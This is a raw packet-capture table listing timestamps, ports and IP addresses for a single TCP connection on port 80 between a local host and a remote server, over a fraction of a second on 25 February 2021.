Feb 25, 2021 11:05:05.110589981 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.110606909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.110644102 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.111119986 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.111135960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.111171007 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.111812115 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.111825943 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.111861944 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.112433910 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.112495899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.112509966 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.112596035 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.113245964 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.113260984 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.113436937 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.113873005 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.113887072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.113972902 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.114582062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.114603043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.114666939 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.115266085 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.115279913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.115322113 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.115987062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.116003036 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.116097927 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.116681099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.116695881 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.117013931 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.117414951 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.117429972 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.117490053 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.118041039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.118061066 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.118616104 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.118717909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.118731976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.119371891 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.119434118 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.119451046 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.120125055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.120137930 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.120138884 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.120199919 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.120819092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.120841980 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.120887041 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.121535063 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.121551037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.121716022 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.122193098 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.122217894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.122911930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.122932911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.122934103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.123027086 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.123601913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.123622894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.123708963 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.124278069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.124291897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.124389887 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.124988079 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.125013113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.125077009 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.125668049 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.125684023 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.125854969 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.126367092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.126380920 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.126945019 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.127043009 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.127057076 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.128118038 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.129251957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.129267931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.130548954 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.130567074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.130623102 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.130851984 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.130865097 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.130893946 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.131618023 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.131644964 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.131661892 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.131736994 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.134830952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.134850979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.135808945 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.135823965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.135874987 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.136393070 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.137341022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.137368917 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.137475967 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.138147116 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.138163090 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.138266087 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.138962030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.138978004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.139108896 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.140178919 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.140196085 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.140258074 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.140863895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.140880108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.141170025 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.141182899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.141201019 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.141302109 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.143110037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.143126965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.143281937 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.143412113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.143424034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.143752098 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.144256115 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.144270897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.144346952 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.145441055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.145458937 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.146070004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.146084070 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.146107912 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.146114111 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.146177053 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.146872044 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.146888971 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.146908998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.146964073 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.148195982 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.148211956 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.148233891 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.148308039 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.148643017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.148657084 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.148673058 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.148739100 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.149597883 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.149614096 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.149636030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.149684906 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.150510073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.150525093 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.150548935 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.150609016 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.151437044 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.151452065 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.151473999 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.151534081 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.152369976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.152662992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.152683020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.152698994 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.152717113 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.152760029 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.153556108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.153583050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.153599977 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.153651953 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.153683901 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.154406071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.154433012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.154449940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.154499054 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.155273914 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.155297995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.155318022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.155345917 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.155378103 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.156146049 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.156172991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.156189919 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.156220913 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.157000065 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.157021999 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.157040119 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.157092094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.157155991 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.157834053 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.157856941 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.157870054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.157912016 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.158659935 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.158668995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.158682108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.158835888 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.159486055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.159511089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.159528017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.159600973 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.160314083 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.160341978 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.160361052 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.160418034 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.160480976 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.161065102 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.161086082 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.161108017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.161457062 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.161823988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.161845922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.161861897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.161880970 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.161911011 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.162566900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.162592888 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.162609100 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.162653923 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.163256884 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.163281918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.163300991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.163343906 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.163386106 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.164035082 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.164057970 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.164083958 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.164100885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.164123058 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.164149046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.165008068 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.165030956 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.165090084 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.165442944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.165462017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.165479898 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.165496111 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.165512085 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.165545940 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.166398048 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.166424990 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.166440010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.166456938 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.166495085 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.166526079 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.167349100 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.167382002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.167397976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.167413950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.167454958 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.168226957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.168252945 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.168263912 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.168276072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.168354988 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.169150114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.169179916 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.169194937 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.169210911 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.169229031 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.169251919 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.170034885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.170061111 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.170078993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.170100927 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.170125008 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.170162916 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.170911074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.170941114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.170959949 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.170975924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.171001911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.171036005 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177472115 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177506924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177521944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177544117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177561998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177577972 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177578926 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177593946 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177611113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177627087 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177627087 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177644968 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177654028 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177661896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177681923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177685022 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177699089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177715063 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177716970 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177731991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177747011 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177762032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177768946 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177778959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177794933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177805901 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177814007 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177831888 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177834034 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177848101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177862883 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177864075 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177880049 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177895069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177901983 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177911043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177926064 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177944899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177946091 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177962065 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.177963018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177978039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.177994967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.178009987 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.178019047 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.178050995 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.178430080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.178451061 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.178467035 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.178482056 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.178498983 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.178528070 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.179269075 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179294109 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179308891 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179325104 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179356098 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.179390907 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.179858923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179878950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179893970 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179909945 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179924965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179928064 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.179944992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.179975033 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.180013895 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.180727959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.180748940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.180761099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.180777073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.180792093 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.180805922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.180828094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.180888891 CET	49727	80	192.168.2.5	172.67.172.17
